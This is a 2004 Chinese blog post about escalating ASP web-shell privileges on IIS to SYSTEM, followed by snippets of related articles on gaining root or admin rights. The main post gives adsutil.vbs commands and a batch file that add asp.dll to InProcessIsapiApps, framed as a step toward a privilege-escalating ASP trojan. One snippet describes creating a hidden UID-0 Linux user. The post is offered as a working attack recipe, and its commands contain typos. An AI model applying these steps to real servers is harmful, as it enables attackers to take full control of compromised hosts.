将asp权限提到最高

原创 2004年10月28日 15:03:00
by: cnqing from:http://friend.91eb.com
本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。
原理:
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system
方法:
第一步。
得到inprocesslsapiapps内容,用命令"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。
第二步
写一个bat内容为"cscript C:/Inetpub/AdminScripts/adsutil vbs set w3svc/inprpocessisapiapps "C:/Inetpub/AdminScripts/asp.dll" ·····
省略号为复制下的内容。中间用空格分开不要带回车符
最后运行这个bat就行了。
例如:
我用"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"得到
"c:/winnt/system32/inetsrv/httpext.dll"
"c:/winnt/system32/inetsrv/httpodbc.dll"
"C:/WINNT/system32/inetsrv/ssinc.dll"
"C:/WINNT/System32/msw3prt.dll"
"C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/_vti_aut/author.dll"
"C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/_vti_adm/admin.dll"
"C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/shtml.dll"


那么你的bat就应该是:

cscript C:/Inetpub/AdminScripts/adsutil vbs set w3svc/inprpocessisapiapps "C:/Inetpub/AdminScripts/asp.dll" "c:/winnt/system32/inetsrv/httpext.dll" "c:/winnt/system32/inetsrv/httpodbc.dll" "C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/System32/msw3prt.dll" "C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/_vti_aut/author.dll" "C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/_vti_adm/admin.dll" "C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/shtml.dll"


已测试成功!!

如何使用命令行更改文件以及文件夹的访问控制权限,从而达到最高权限控制文件的目的

一、使用Cacls.exe命令   这是一个在Windows 2000/XP/Server 2003操作系统下都可以使用的命令,作用是显示或者修改文件的访问控制表,在命令中可以使用通配符指定多个...
  • ghevinn
  • ghevinn
  • 2012年08月28日 10:16
  • 1549

【Android】应用获取用户最高权限

转载地址 要让Android应用获得Root权限,首先Android设备必须已经获得Root权限。 应用获取Root权限的原理:让应用的代码执行目录获取最高权限。在Linux中通过chmod 77...
  • zouchengxufei
  • zouchengxufei
  • 2015年03月10日 09:28
  • 843

获取linux最高权限

sudo su
  • danelumax2
  • danelumax2
  • 2014年01月11日 15:34
  • 1206

Linux——CentOS建立一个最高权限的用户

进root随便建个用户,然后 vim /etc/passwd 把刚才建的如konsy的id和gid改成0,保存退出 登录这个用户就跟root一样...
  • sinat_36053757
  • sinat_36053757
  • 2017年04月21日 10:20
  • 525

取得最高系统管理员权限的有效方法

一. 权限的由来远方的某个山脚下,有一片被森林包围的草原,草原边上居住着一群以牧羊为生的牧民。草原边缘的森林里,生存着各种动物,包括野狼。  由于羊群是牧民们的主要生活来源,它们的价值便显得特别珍贵,...
  • zqpgood
  • zqpgood
  • 2010年09月07日 00:54
  • 3002

为什么linux设置文件最大权限是chmod 777

为什么我们经常遇到设置文件权限chmod 777 或chmod 775 。。。等等? 嗯哼?! 因为首先文件权限占10位:-rwxrwxrwx这样的格式; 第一位不管,后面的按3位一组分别...
  • baidu_15766691
  • baidu_15766691
  • 2016年08月22日 16:20
  • 1653

Windows提升进程权限

Windows提升进程权限 文章一: 在枚举/结束系统进程或操作系统服务时,会出现权限不足而失败的情况,这时就需要提升自己进程到系统权限,其实提升权限的代码很简单的,看过的最经典的应该是《WIND...
  • liubing8609
  • liubing8609
  • 2015年01月03日 15:00
  • 2540

获取mac最高root权限登录系统

1、打开终端2、输入命令sudo passwd root(1)接着然后按照提示,输入当前登录用户密码, (2)通过以后,提示输入两遍root的密码。 到此,就设置好root帐号密码了,则可以用ro...
  • seamon0627
  • seamon0627
  • 2016年06月07日 14:36
  • 425

Win7 一键获得管理所有权限(最高权限)注册表

复制以下代码保存为.reg格式,点击导入就可以了,然后想删除就先右键取得管理员权限就可以删除了。 Windows Registry Editor Version 5.00 ;管理员取得所有权 [HK...
  • Andrew_wx
  • Andrew_wx
  • 2011年08月05日 01:02
  • 13397

如何用ASP实现权限的设置?

1、对于所有脚本文件,只在IIS设置里给予“纯脚本”的执行权限。 2、对于数据库文件,单独设置文件属性中“IUSR_(计算机名)”用户有修改权限。 3、对于主目录,只给予“读取”、“索引资源”、“记录...
  • chinajobs
  • chinajobs
  • 2015年12月16日 11:26
  • 834
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:将asp权限提到最高
举报原因:
原因补充:

(最多只允许输入30个字)